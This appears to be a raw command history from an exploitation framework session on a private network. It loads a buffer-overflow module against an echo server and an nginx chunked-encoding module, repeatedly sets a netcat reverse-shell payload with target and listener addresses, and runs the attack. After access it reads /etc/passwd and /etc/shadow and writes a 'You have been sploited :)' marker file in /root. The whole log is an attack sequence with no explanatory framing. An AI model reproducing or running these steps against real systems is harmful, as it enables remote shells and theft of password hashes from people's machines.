load linux_x64_ovrflwmyechosrv
set payload reverse/linux_netcat
set rhost 192.168.1.76
set rport 1025
set lhost 192.168.1.84
set lport 4444
run
ls
load linux_x64_ovrflwmyechosrv
run payload reverse/linux_netcat rhost 192.168.1.76 rport 1025 lhost 192.168.1.84 lport 4444
cat /etc/passwd
cat /etc/shadow
touch /root/sploited.txt
gnome-terminal -- tail -f -n 1 /root/sploited.txt
echo "You have been sploited :)" >> /root/sploited.txt
load linux_x64_ovrflwmyechosrv
show help
help pwn
load linux_x64_ovrflwmyechosrv
help pwn
pwn
show exploit
show exploits
load linux_x64_nginx_chunked
show payloads
show author
load linux_x64_nginx_chunked
show author
load linux_x64_ovrflwmyechosrv
show author
show name
load linux_x64_nginx_chunked
show author
load linux_x64_nginx_chunked
show author
show name
show author
load linux_x64_nginx_chunked
show author
show name
show options
load linux_x64_ovrflwmyechosrv
show author
show name
load linux_x64_nginx_chunked
set PAYLOAD reverse/linux_netcat
set lhost 192.168.1.84
set rhost 192.168.1.52
set lport 4444
set rport 8081
pwn
load linux_x64_nginx_chunked
set PAYLOAD reverse/linux_netcat
set lhost 192.168.1.84
set rhost 192.168.1.52
set lport 4444
set rport 8081
pwn
load linux_x64_nginx_chunked
set lhost 192.168.1.84
set rhost 192.168.1.52
set lport 4444
set rport 8081
pwn
set PAYLOAD reverse/linux_netcat
pwn
load linux_x64_nginx_chunked
set PAYLOAD reverse/linux_netcat
set lhost 192.168.1.84
set rhost 192.168.1.52
set rport 8081
set lport 4444
pwn
set rhost 192.168.1.52
load linux_x64_nginx_chunked
set rhost 192.168.1.52
set lhost 192.168.1.84
set rport 8081
set lport 4444
pwn
set PAYLOAD reverse/linux_netcat
pwn
set PAYLOAD reverse/linux_netcat
load linux_x64_nginx_chunked
set PAYLOAD reverse/linux_netcat
set lhost 192.168.1.84
set lport 4444
set rhost 192.168.1.52
set rport 8081
pwn
load linux_x64_nginx_chunked
set PAYLOAD reverse/linux_netcat
set rhost 192.168.1.52
set rport 8081
set lhost 192.168.1.84
set lport 4444
pwn
load linux_x64_nginx_chunked
set PAYLOAD reverse/linux_netcat
set lhost 192.168.1.84
set lport 4444
set rhost 192.168.1.52
set rport 8081
pwn
load linux_x64_nginx_chunked
set PAYLOAD reverse/linux_netcat
set lhost 192.168.1.84
set lport 4444
set rhost 192.168.1.52
set rport 8081
pwn
load linux_x64_nginx_chunked
set PAYLOAD reverse/linux_netcat
set lhost 192.168.1.84
set lport 4444
set rhost 192.168.1.52
set rport 8081
pwn
load linux_x64_nginx_chunked
pwn rhost 192.168.1.52 rport 8081 lhost 192.168.1.84 lport 4444 payload reverse/linux_netcat
load linux_x64_nginx_chunked
pwn rhost 192.168.1.52 rport 8081 lhost 192.168.1.84 lport 4444 payload reverse/linux_netcat
load linux_x64_nginx_chunked
pwn rhost 192.168.1.52 rport 8081 lhost 192.168.1.84 lport 4444 payload reverse/linux_netcat
clear
load linux_x64_nginx_chunked
pwn rhost 192.168.1.52 rport 8081 lhost 192.168.1.84 lport 4444 payload reverse/linux_netcat
load linux_x64_nginx_chunked
pwn rhost 192.168.1.52 rport 8081 lhost 192.168.1.84 lport 4444 payload reverse/linux_netcat
load linux_x64_nginx_chunked
pwn rhost 192.168.1.52 rport 8081 lhost 192.168.1.84 lport 4444 payload reverse/linux_netcat
load linux_x64_nginx_chunked
pwn rhost 192.168.1.52 rport 8081 lhost 192.168.1.84 lport 4444 payload reverse/linux_netcat
